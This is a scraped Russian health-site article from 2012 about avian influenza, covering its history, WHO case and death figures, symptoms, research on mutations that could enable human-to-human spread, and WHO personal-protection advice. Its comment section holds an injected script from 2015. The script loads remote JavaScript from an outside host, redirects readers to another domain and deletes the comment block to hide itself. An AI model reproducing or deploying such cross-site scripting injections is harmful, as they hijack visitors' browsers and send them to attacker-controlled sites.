Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вирус птичьего гриппа не ...  >>  Вирус птичьего гриппа не дремлет
 
Обратная связь
 

Вирус птичьего гриппа не дремлет

Размер шрифта
07 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

В настоящее время вирус птичьего гриппа не передается от человека к человеку. Но если это случится в связи с мутацией вируса, то человечество ждет пандемия этой страшной инфекции.

Что такое птичий грипп

Птичий грипп – это инфекционное заболевание птиц, но некоторые вирусы птичьего гриппа могут преодолеть видовой барьер и вызвать заболевание у людей. Первые случаи птичьего гриппа у человека зарегистрированы в 1997 году во время вспышки заболевания среди домашних птиц в Гонконге. К августу 2005 года зарегистрировано 112 случаев птичьего гриппа среди людей во Вьетнаме, Таиланде, Камбодже, Индонезии.

По данным Всемирной организации здравоохранения (ВОЗ), с февраля 2003 года по февраль 2008 года из 361 подтвержденного случая заражения людей вирусом птичьего гриппа 227 стали смертельными. Последняя смерть человека от птичьего гриппа зафиксирована в конце декабря 2011 года в Китае.

Первые симптомы птичьего гриппа не отличаются от симптомов сезонного гриппа: высокая температура (как правило, выше 38°C), озноб, головная боль, слабость, боль в мышцах. В некоторых случаях в начале заболевания появляется диарея, рвота, боли в области живота и груди, кровотечение из носа и десен. На 2-3 день болезни появляется кашель и одышка, что свидетельствует о развитии пневмонии.

Суть исследования

На данный момент вирус птичьего гриппа передается только от птицы к птице и от птицы к человеку. В предыдущих исследованиях ученые установили, что от пандемии нас отделяют всего 5 мутаций. Если вирус мутирует, то птичий грипп будет передаваться от человека к человеку. Однако полученные результаты достаточно спорные, поскольку исследования проводились только в лабораторных условиях.

До настоящего времени ученые не были уверены, могут ли мутации произойти в естественных условиях. Однако у вирусов, которые заражают птиц, уже есть 2 из 5 опасных мутаций. Недавно ученым удалось создать лабораторные виды вирусов, которые могут передаваться от человека к человеку.

Это исследование чрезвычайно важно для всех, кто работает над созданием вакцин, диагностических тестов и противовирусных препаратов, которые пригодятся, если начнется пандемия птичьего гриппа.

Рекомендации ВОЗ по личной защите от птичьего гриппа

  • Не разрешайте детям играть с дикими птицами или с больной домашней птицей.
  • Не трогайте руками и не используйте в пищу погибших или больных птиц.
  • При обнаружении трупа мертвой птицы ограничьте к нему доступ других людей, по возможности закопайте его, защитив рот и нос маской или респиратором, а руки – перчатками. После окончания работы тщательно вымойте руки и лицо с мылом и смените одежду.
  • Не употребляйте сырое или плохо приготовленное мясо или яйца птиц.
  • Мясо или яйца птиц храните в холодильнике отдельно от других продуктов питания.
  • При обнаружении больной птицы срочно известите местного ветеринарного врача.
  • Если после контакта с птицей у вас возникло острое респираторное (гриппоподобное) заболевание, срочно обратитесь к врачу.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы о простуде, которым пора положить конец!   Европейская неделя иммунизации: бояться надо не вакцинации, а вакцинофобии   Собрались в отпуск? В этих странах вы обязательно заболеете!   А в России правильно лечат грипп?  
06 августа 2012Вирус птичьего гриппа не дремлет! 05 февраля 2013Почему мы болеем гриппом зимой
 
21 сентября 2012ВИЧ полезен в борьбе с раком! 03 сентября 2012Опасный вирус убивает стафилококк, против которого бессильны лекарства!
 

Слайдшоу

1
Врачи против параллельного мира
Грипп или простуда?
Можно ли жить с бронхитом?

Тесты

1
Что вы знаете о пневмонии?
Заболеет ли ваша семья?
Грипп или простуда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.